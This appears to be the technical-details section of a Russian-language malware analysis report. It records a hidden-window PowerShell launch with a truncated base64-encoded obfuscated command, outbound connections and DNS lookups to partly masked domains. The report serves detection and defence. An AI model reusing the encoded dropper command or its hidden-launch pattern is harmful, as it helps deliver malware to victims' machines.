Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- 'ph###acmi.com':80
- 're#####areleader.com':80
- 're####realty.com':443
- DNS ASK an#####.#eadersareleader.com
- DNS ASK no###atmtk.com
- DNS ASK am#e.in
- DNS ASK co#########rldwidetransportation.com
- DNS ASK re####realty.com
- DNS ASK ph###acmi.com
- DNS ASK re#####areleader.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)